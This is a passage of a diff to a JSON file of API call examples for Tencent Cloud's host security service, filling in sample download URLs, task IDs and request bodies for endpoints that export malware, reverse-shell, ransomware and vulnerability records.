3151
|
}
|
3180
3152
|
],
|
@@ -3198,7 +3170,7 @@
|
|
3198
3170
|
{
|
3199
3171
|
"document": "导出已忽略的检测项信息",
|
3200
3172
|
"input": "https://cwp.tencentcloudapi.com/?Action=ExportIgnoreBaselineRule\n&RuleName=\"检测项1\"\n&<公共请求参数>",
|
3201
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"requestId\",\n \"TaskId\": \"12123\"\n }\n}",
|
3173
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"RequestId\": \"requestId\",\n \"TaskId\": \"12123\"\n }\n}",
|
3202
3174
|
"title": "忽略基线检测项导出"
|
3203
3175
|
}
|
3204
3176
|
],
|
@@ -3206,15 +3178,15 @@
|
|
3206
3178
|
{
|
3207
3179
|
"document": "根据忽略检测项id导出影响主机列表数据",
|
3208
3180
|
"input": "https://cwp.tencentcloudapi.com/?Action=ExportIgnoreRuleEffectHostList\n&RuleId=1\n&<公共请求参数>",
|
3209
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"TaskId\": \"12312\",\n \"RequestId\": \"
|
3181
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"TaskId\": \"12312\",\n \"RequestId\": \"d73d4495-1895-43a8-95be-f447b02e253d\"\n }\n}",
|
3210
3182
|
"title": "导出忽略检测项影响主机列表"
|
3211
3183
|
}
|
3212
3184
|
],
|
3213
3185
|
"ExportJavaMemShellPlugins": [
|
3214
3186
|
{
|
3215
3187
|
"document": "导出",
|
3216
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportJavaMemShellPlugins\n<公共请求参数>\n\n{}",
|
3217
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"TaskId\": \"
|
3188
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportJavaMemShellPlugins\n<公共请求参数>\n\n{\n \"Filters\": [\n {\n \"Name\": \"Quuid\",\n \"Values\": [\n \"d4cc302e-09e5-436f-b99b-5ab9c9070323\"\n ]\n }\n ]\n}",
|
3189
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"TaskId\": \"187653\"\n }\n}",
|
3218
3190
|
"title": "导出java内存马插件列表"
|
3219
3191
|
}
|
3220
3192
|
],
|
@@ -3222,7 +3194,7 @@
|
|
3222
3194
|
{
|
3223
3195
|
"document": "导出",
|
3224
3196
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportJavaMemShells\n<公共请求参数>\n\n{}",
|
3225
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"TaskId\": \"
|
3197
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"TaskId\": \"184113\"\n }\n}",
|
3226
3198
|
"title": "导出java内存马事件列表"
|
3227
3199
|
}
|
3228
3200
|
],
|
@@ -3230,31 +3202,31 @@
|
|
3230
3202
|
{
|
3231
3203
|
"document": "导出授权使用记录/历史记录",
|
3232
3204
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportLicenseDetail\n<公共请求参数>\n\n{}",
|
3233
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"d09cfcae-fab2-4cb7-a41e-5fd4c12d69f4\",\n \"DownloadUrl\": \"\",\n \"TaskId\": 1\n }\n}",
|
3205
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d09cfcae-fab2-4cb7-a41e-5fd4c12d69f4\",\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"TaskId\": 1\n }\n}",
|
3234
3206
|
"title": "示例"
|
3235
3207
|
}
|
3236
3208
|
],
|
3237
3209
|
"ExportMaliciousRequests": [
|
3238
3210
|
{
|
3239
3211
|
"document": "导出下载恶意请求文件",
|
3240
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportMaliciousRequests\n
|
3241
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"
|
3212
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportMaliciousRequests\n&<公共请求参数>\n\n{\"Filters\": [\"Name\": \"Quuid\",\"Values\": [\"d4cc302e-09e5-436f-b99b-5ab9c9070323\"]}",
|
3213
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"TaskId\": \"1\"\n }\n}",
|
3242
3214
|
"title": "导出下载恶意请求文件"
|
3243
3215
|
}
|
3244
3216
|
],
|
3245
3217
|
"ExportMalwares": [
|
3246
3218
|
{
|
3247
3219
|
"document": "导出木马记录",
|
3248
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportMalwares\n&<公共请求参数>",
|
3249
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"100000\"\n }\n}",
|
3220
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportMalwares\n&<公共请求参数> \n\n{\"Filters\": [\"Name\": \"Quuid\",\"Values\": [\"d4cc302e-09e5-436f-b99b-5ab9c9070323\"]}",
|
3221
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"TaskId\": \"100000\"\n }\n}",
|
3250
3222
|
"title": "导出木马记录"
|
3251
3223
|
}
|
3252
3224
|
],
|
3253
3225
|
"ExportNonlocalLoginPlaces": [
|
3254
3226
|
{
|
3255
3227
|
"document": "导出异地登录事件记录CSV文件",
|
3256
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportNonlocalLoginPlaces\n&<公共请求参数>",
|
3257
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"1596595610\"\n }\n}",
|
3228
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportNonlocalLoginPlaces\n&<公共请求参数> \n\n{\"Filters\": [\"Name\": \"Status\",\"Values\": [\"1\"]}",
|
3229
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"TaskId\": \"1596595610\"\n }\n}",
|
3258
3230
|
"title": "导出异地登录记录"
|
3259
3231
|
}
|
3260
3232
|
],
|
@@ -3262,7 +3234,7 @@
|
|
3262
3234
|
{
|
3263
3235
|
"document": "导出本地提权事件",
|
3264
3236
|
"input": "https://cwp.tencentcloudapi.com/?Action=ExportPrivilegeEvents\n&<公共请求参数>",
|
3265
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"1596595610\"\n }\n}",
|
3237
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"TaskId\": \"1596595610\"\n }\n}",
|
3266
3238
|
"title": "导出本地提权事件"
|
3267
3239
|
}
|
3268
3240
|
],
|
@@ -3270,7 +3242,7 @@
|
|
3270
3242
|
{
|
3271
3243
|
"document": "导出",
|
3272
3244
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportProtectDirList\n<公共请求参数>\n\n{}",
|
3273
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3245
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"F00A8503-6233-452E-913E-DAFEE9******\",\n \"TaskId\": \"173042****\"\n }\n}",
|
3274
3246
|
"title": "示例"
|
3275
3247
|
}
|
3276
3248
|
],
|
@@ -3278,7 +3250,7 @@
|
|
3278
3250
|
{
|
3279
3251
|
"document": "导出主机快照备份列表",
|
3280
3252
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseBackupList\n<公共请求参数>\n\n{\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n}",
|
3281
|
-
"output": "{\n \"Response\": {\n \"TaskId\": \"
|
3253
|
+
"output": "{\n \"Response\": {\n \"TaskId\": \"1\",\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\"\n }\n}",
|
3282
3254
|
"title": "导出主机快照备份列表"
|
3283
3255
|
}
|
3284
3256
|
],
|
@@ -3286,7 +3258,7 @@
|
|
3286
3258
|
{
|
3287
3259
|
"document": "根据过滤参数导出防勒索事件列表",
|
3288
3260
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseEventsList\n<公共请求参数>\n\n{}",
|
3289
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3261
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"TaskId\": \"1\"\n }\n}",
|
3290
3262
|
"title": "导出防勒索事件列表"
|
3291
3263
|
}
|
3292
3264
|
],
|
@@ -3294,7 +3266,7 @@
|
|
3294
3266
|
{
|
3295
3267
|
"document": "根据过滤参数导出备份详情列表",
|
3296
3268
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseMachineList\n<公共请求参数>\n\n{}",
|
3297
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3269
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"TaskId\": \"1\"\n }\n}",
|
3298
3270
|
"title": "导出备份详情列表"
|
3299
3271
|
}
|
3300
3272
|
],
|
@@ -3302,7 +3274,7 @@
|
|
3302
3274
|
{
|
3303
3275
|
"document": "根据过滤参数导出防勒索策略列表",
|
3304
3276
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseStrategyList\n<公共请求参数>\n\n{}",
|
3305
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3277
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"TaskId\": \"1\"\n }\n}",
|
3306
3278
|
"title": "导出防勒索策略列表"
|
3307
3279
|
}
|
3308
3280
|
],
|
@@ -3310,15 +3282,15 @@
|
|
3310
3282
|
{
|
3311
3283
|
"document": "导出勒索防御策略绑定机器列表",
|
3312
3284
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRansomDefenseStrategyMachines\n<公共请求参数>\n\n{}",
|
3313
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3285
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"TaskId\": \"1\"\n }\n}",
|
3314
3286
|
"title": "导出勒索防御策略绑定机器列表"
|
3315
3287
|
}
|
3316
3288
|
],
|
3317
3289
|
"ExportReverseShellEvents": [
|
3318
3290
|
{
|
3319
3291
|
"document": "导出反弹Shell事件",
|
3320
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportReverseShellEvents\n&<公共请求参数>",
|
3321
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"
|
3292
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportReverseShellEvents\n&<公共请求参数> \n\n{\"Filters\": [\"Name\": \"Quuid\",\"Values\": [\"d4cc302e-09e5-436f-b99b-5ab9c9070323\"]}",
|
3293
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"TaskId\": \"1\"\n }\n}",
|
3322
3294
|
"title": "导出反弹Shell事件"
|
3323
3295
|
}
|
3324
3296
|
],
|
@@ -3342,7 +3314,7 @@
|
|
3342
3314
|
{
|
3343
3315
|
"document": "导出",
|
3344
3316
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportRiskProcessEvents\n<公共请求参数>\n\n{}",
|
3345
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3317
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"TaskId\": \"1\"\n }\n}",
|
3346
3318
|
"title": "导出异常进程事件"
|
3347
3319
|
}
|
3348
3320
|
],
|
@@ -3357,8 +3329,8 @@
|
|
3357
3329
|
"ExportSecurityTrends": [
|
3358
3330
|
{
|
3359
3331
|
"document": "",
|
3360
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportSecurityTrends\n&BeginDate=2020-06-01\n&EndDate=2020-06-10\n&<公共请求参数>",
|
3361
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/
|
3332
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportSecurityTrends\n&BeginDate=2020-06-01\n&EndDate=2020-06-10\n&<公共请求参数> \n\n{\"BeginDate\":\"2020-06-01\", \"EndDate\":\"2020-06-02\"}",
|
3333
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/test.csv\"\n }\n}",
|
3362
3334
|
"title": "导出风险趋势"
|
3363
3335
|
}
|
3364
3336
|
],
|
@@ -3366,7 +3338,7 @@
|
|
3366
3338
|
{
|
3367
3339
|
"document": "",
|
3368
3340
|
"input": "https://cwp.tencentcloudapi.com/?Action=ExportTasks\n&TaskId=c44c00fb-ab35-22e5-78e8-9a8a910d96f5\n&<公共请求参数>",
|
3369
|
-
"output": "{\n \"Response\": {\n \"Status\": \"FINISHED\",\n \"DownloadUrl\": \"http
|
3341
|
+
"output": "{\n \"Response\": {\n \"Status\": \"FINISHED\",\n \"DownloadUrl\": \"http:DownloadUrl\",\n \"RequestId\": \"f8bcfd50-3a9d-ac4c-ba95-6ed70252453e\"\n }\n}",
|
3370
3342
|
"title": "异步导出任务"
|
3371
3343
|
}
|
3372
3344
|
],
|
@@ -3374,15 +3346,15 @@
|
|
3374
3346
|
{
|
3375
3347
|
"document": "",
|
3376
3348
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportVulDefenceEvent\n<公共请求参数>\n\n{}",
|
3377
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3349
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"TaskId\": \"1730625501802161207\"\n }\n}",
|
3378
3350
|
"title": "导出漏洞防御事件"
|
3379
3351
|
}
|
3380
3352
|
],
|
3381
3353
|
"ExportVulDefenceList": [
|
3382
3354
|
{
|
3383
3355
|
"document": "",
|
3384
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportVulDefenceList\n<公共请求参数>\n\n{\n \"Where\": [\n \"\"\n ],\n \"Filters\": [\n {\n \"Values\": [\n \"\"\n ],\n \"Name\": \"\",\n \"ExactMatch\": \"false\"\n }\n ]\n}",
|
3385
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"d14c8764-de8d-4eda-89e9-3a4b4fb5d7c4\",\n \"TaskId\": \"
|
3356
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportVulDefenceList\n<公共请求参数>\n\n{\n \"Where\": [\n \"Uuid\"\n ],\n \"Filters\": [\n {\n \"Values\": [\n \"625e4ed2-f91a-4b35-afdb-98a6216ef722\"\n ],\n \"Name\": \"Uuid\",\n \"ExactMatch\": \"false\"\n }\n ]\n}",
|
3357
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d14c8764-de8d-4eda-89e9-3a4b4fb5d7c4\",\n \"TaskId\": \"1730637975165420573\"\n }\n}",
|
3386
3358
|
"title": "示例"
|
3387
3359
|
}
|
3388
3360
|
],
|
@@ -3390,7 +3362,7 @@
|
|
3390
3362
|
{
|
3391
3363
|
"document": "",
|
3392
3364
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportVulDefencePluginEvent\n<公共请求参数>\n\n{}",
|
3393
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3365
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"TaskId\": \"1730625424679783547\"\n }\n}",
|
3394
3366
|
"title": "导出漏洞防御插件事件"
|
3395
3367
|
}
|
3396
3368
|
],
|
@@ -3398,7 +3370,7 @@
|
|
3398
3370
|
{
|
3399
3371
|
"document": "导出本次漏洞检测Excel",
|
3400
3372
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportVulDetectionExcel\n<公共请求参数>\n\n{\n \"TaskId\": \"1596595610\"\n}",
|
3401
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"\",\n \"TaskId\": \"1615549629\"\n }\n}",
|
3373
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"TaskId\": \"1615549629\"\n }\n}",
|
3402
3374
|
"title": "导出本次漏洞检测Excel"
|
3403
3375
|
}
|
3404
3376
|
],
|
@@ -3406,7 +3378,7 @@
|
|
3406
3378
|
{
|
3407
3379
|
"document": "",
|
3408
3380
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportVulDetectionReport\n<公共请求参数>\n\n{\n \"TaskId\": \"1596595610\"\n}",
|
3409
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3381
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"DownloadUrl\": \"https://xxx.cos.ap-guangzhou.myqcloud.com/%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B%E6%8A%A5%E5%91%8A_20210312.pdf?q-sign-algorithm=sha1&q-ak=xxx&q-sign-time=1615549630%3B1615553230&q-key-time=1615549630%3B1615553230&q-header-list=host&q-url-param-list=&q-signature=xxx\",\n \"TaskId\": \"15674\"\n }\n}",
|
3410
3382
|
"title": "导出漏洞检测报告"
|
3411
3383
|
}
|
3412
3384
|
],
|
@@ -3414,7 +3386,7 @@
|
|
3414
3386
|
{
|
3415
3387
|
"document": "",
|
3416
3388
|
"input": "https://cwp.tencentcloudapi.com/?Action=ExportVulEffectHostList\n&VulId=100435\n&<公共请求参数>",
|
3417
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
|
3389
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
|
3418
3390
|
"title": "导出漏洞影响主机列表"
|
3419
3391
|
}
|
3420
3392
|
],
|
@@ -3422,7 +3394,7 @@
|
|
3422
3394
|
{
|
3423
3395
|
"document": "",
|
3424
3396
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportVulInfo\n<公共请求参数>\n\n{\n \"VulId\": \"100435\"\n}",
|
3425
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3397
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"TaskId\": 1\n }\n}",
|
3426
3398
|
"title": "导出漏洞影响主机列表"
|
3427
3399
|
}
|
3428
3400
|
],
|
@@ -3430,7 +3402,7 @@
|
|
3430
3402
|
{
|
3431
3403
|
"document": "导出漏洞列表数据,获取下载url",
|
3432
3404
|
"input": "https://cwp.tencentcloudapi.com/?Action=ExportVulList\n&IfDetail=1\n&<公共请求参数>",
|
3433
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
|
3405
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\",\n \"TaskId\": \"10001\"\n }\n}",
|
3434
3406
|
"title": "导出漏洞列表数据,获取下载url"
|
3435
3407
|
}
|
3436
3408
|
],
|
@@ -3438,14 +3410,14 @@
|
|
3438
3410
|
{
|
3439
3411
|
"document": "",
|
3440
3412
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportWebPageEventList\n<公共请求参数>\n\n{\n \"By\": \"CreateTime\",\n \"Order\": 1,\n \"Filters\": [\n {\n \"Name\": \"IpOrAlias\",\n \"Values\": [\n \"HostName or HostIp\"\n ]\n }\n ]\n}",
|
3441
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"d9506441-52bc-4d14-a767-7e1251ed3ced\",\n \"TaskId\": \"
|
3413
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d9506441-52bc-4d14-a767-7e1251ed3ced\",\n \"TaskId\": \"173042****\"\n }\n}",
|
3442
3414
|
"title": "示例"
|
3443
3415
|
}
|
3444
3416
|
],
|
3445
3417
|
"FixBaselineDetect": [
|
3446
3418
|
{
|
3447
3419
|
"document": "",
|
3448
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: FixBaselineDetect\n<公共请求参数>\n\n{\n \"ItemId\"
|
3420
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: FixBaselineDetect\n<公共请求参数>\n\n{\n \"ItemId\": \"1100\",\n \"HostId\": \"a0770b41-9697-4a1d-8150-b8fa247b6189\",\n \"Data\": [\n \"977\",\n \"e7c153cd9e70120a1d9f3610db0a15d0\"\n ]\n}",
|
3449
3421
|
"output": "{\n \"Response\": {\n \"RequestId\": \"898d14bd-2334-4b8d-9240-6ad77e48df45\"\n }\n}",
|
3450
3422
|
"title": "修复"
|
3451
3423
|
}
|
@@ -3470,7 +3442,7 @@
|
|
3470
3442
|
{
|
3471
3443
|
"document": "获取本地存储键值列表",
|
3472
3444
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: KeysLocalStorage\n<公共请求参数>\n\n{}",
|
3473
|
-
"output": "{\n \"Response\": {\n \"Keys\": [\n \"
|
3445
|
+
"output": "{\n \"Response\": {\n \"Keys\": [\n \"CHECK_BASELINE_G****\"\n ],\n \"RequestId\": \"522d7714-ef53-4940-b0ed-46d59a3cf0fd\"\n }\n}",
|
3474
3446
|
"title": "示例"
|
3475
3447
|
}
|
3476
3448
|
],
|
@@ -3501,7 +3473,7 @@
|
|
3501
3473
|
"ModifyBanWhiteList": [
|
3502
3474
|
{
|
3503
3475
|
"document": "",
|
3504
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ModifyBanWhiteList\n&Rules.Id=1\n&Rules.Remark=
|
3476
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ModifyBanWhiteList\n&Rules.Id=1\n&Rules.Remark=testremark\n&<公共请求参数>",
|
3505
3477
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
3506
3478
|
"title": "修改阻断白名单列表"
|
3507
3479
|
}
|
@@ -3537,7 +3509,7 @@
|
|
3537
3509
|
"ModifyBaselineRule": [
|
3538
3510
|
{
|
3539
3511
|
"document": "创建自定义规则",
|
3540
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBaselineRule\n<公共请求参数>\n\n{\n \"Data\": {\n \"Items\": [\n {\n \"ItemId\": \"1000\",\n \"ItemName\": \"Redis 基线合规检测\"\n }\n ],\n \"RuleDesc\": \"
|
3512
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBaselineRule\n<公共请求参数>\n\n{\n \"Data\": {\n \"Items\": [\n {\n \"ItemId\": \"1000\",\n \"ItemName\": \"Redis 基线合规检测\"\n }\n ],\n \"RuleDesc\": \"rule desc\",\n \"RuleName\": \"rule name1\"\n }\n}",
|
3541
3513
|
"output": "{\n \"Response\": {\n \"RequestId\": \"0358f7f9-d07c-4db8-96ba-eed1bcbd947d\"\n }\n}",
|
3542
3514
|
"title": "创建自定义规则"
|
3543
3515
|
}
|
@@ -3545,7 +3517,7 @@
|
|
3545
3517
|
"ModifyBaselineRuleIgnore": [
|
3546
3518
|
{
|
3547
3519
|
"document": "添加忽略规则",
|
3548
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBaselineRuleIgnore\n<公共请求参数>\n\n{\n \"AssetType\": \"0\",\n \"ItemIds\": [\n \"
|
3520
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBaselineRuleIgnore\n<公共请求参数>\n\n{\n \"AssetType\": \"0\",\n \"ItemIds\": [\n \"1002\"\n ],\n \"RuleName\": \"auto_173042751****\"\n}",
|
3549
3521
|
"output": "{\n \"Response\": {\n \"RequestId\": \"5cbf3ee7-0e7c-4190-aae8-95254726c7f2\"\n }\n}",
|
3550
3522
|
"title": "添加忽略规则"
|
3551
3523
|
}
|
@@ -3553,7 +3525,7 @@
|
|
3553
3525
|
"ModifyBaselineWeakPassword": [
|
3554
3526
|
{
|
3555
3527
|
"document": "修改弱口令配置",
|
3556
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBaselineWeakPassword\n<公共请求参数>\n\n{\n \"Data\": [\n {\n \"PasswordId\": \"3432\",\n \"WeakPassword\": \"
|
3528
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBaselineWeakPassword\n<公共请求参数>\n\n{\n \"Data\": [\n {\n \"PasswordId\": \"3432\",\n \"WeakPassword\": \"1002passwd\"\n }\n ]\n}",
|
3557
3529
|
"output": "{\n \"Response\": {\n \"RequestId\": \"ee20febc-b59d-45ab-97f6-d55efdfa57b7\"\n }\n}",
|
3558
3530
|
"title": "修改弱口令配置"
|
3559
3531
|
}
|
@@ -3561,23 +3533,23 @@
|
|
3561
3533
|
"ModifyBashPolicy": [
|
3562
3534
|
{
|
3563
3535
|
"document": "",
|
3564
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ModifyBashPolicy\n<公共请求参数>\n\n{\n \"Policy\": {\n \"Enable\": \"1\",\n \"Name\": \"testbash\",\n \"BashAction\": \"1\",\n \"Level\": \"0\",\n \"Descript\": \"testbash\",\n \"Rule\": \"dGVzdCo\",\n \"Scope\": \"3\",\n \"White\": \"1\",\n \"DealOldEvents\": \"0\",\n \"Rules\": {\n \"Process\": {\n \"Exe\": \"L3RtcC90ZXN0Cg==\"\n }\n }\n }\n}",
|
3536
|
+
